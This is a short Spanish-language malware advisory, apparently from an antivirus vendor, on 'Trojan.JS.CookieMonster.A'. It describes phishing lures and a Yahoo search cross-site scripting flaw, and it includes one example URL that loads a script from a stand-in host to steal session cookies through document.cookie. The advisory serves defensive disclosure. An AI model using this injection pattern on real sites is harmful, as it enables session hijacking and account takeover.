Trojan.JS.CookieMonster.A

SINTOMAS:

El usuario recibe un correo en su cuenta de yahoo con las palabras “shell” o “c99” en el Asunto (por ejemplo "wtf is c99shell" , "a shell written in php??" o "look what I found, shell") y en el cuerpo del mensaje (ejemplo "check this c99 russian php shell script").
Un segundo caso son aquellos mensajes que aparentemente provienen de hi5.com, con un asunto legítimo (ejemplo “nombre_usuario has sent you a hi5 Friend Request"). Estos correos incitan al usuario a acceder a un enlace para aceptar la invitación del supuesto contacto, pero los enlaces no dirigen a la página hi5.com.

DESCRIPCIÓN TÉCNICA:

Si el usuario accede al enlace desde un webmail, se le redirigirá a una página que utiliza técnicas de "cross site scripting" o "html injection" para ejecutar el código javascript que permite robar las cookies utilizadas por el correo de yahoo.

La vulnerabilidad afecta al motor de búsqueda de yahoo, para que los navegadores que visiten la página maliciosa intenten abrir el siguiente sitio:
http://search.yahoo.com/bin/search?p=[...http://evil.com/script.js...]
El script.js se ejecuta y llama a la función document.cookie para conseguir las cookies del usuario y guardarlas.
Estas cookies permiten al spammer secuestrar la sesión de yahoo, acceder a la cuenta de correo del usuario y recoger las direcciones de los contactos del usuario para enviarles spam, o incluso leer los mensajes del usuario aunque éste haya finalizado la sesión.

INSTRUCCIONES DE LIMPIEZA:

Elimine los mensajes que coincidan con la descripción indicada en el apartado “Síntomas” y cambie su contraseña de inmediato!

ANALIZADO POR:

Sorin Ciorceri, investigador de virus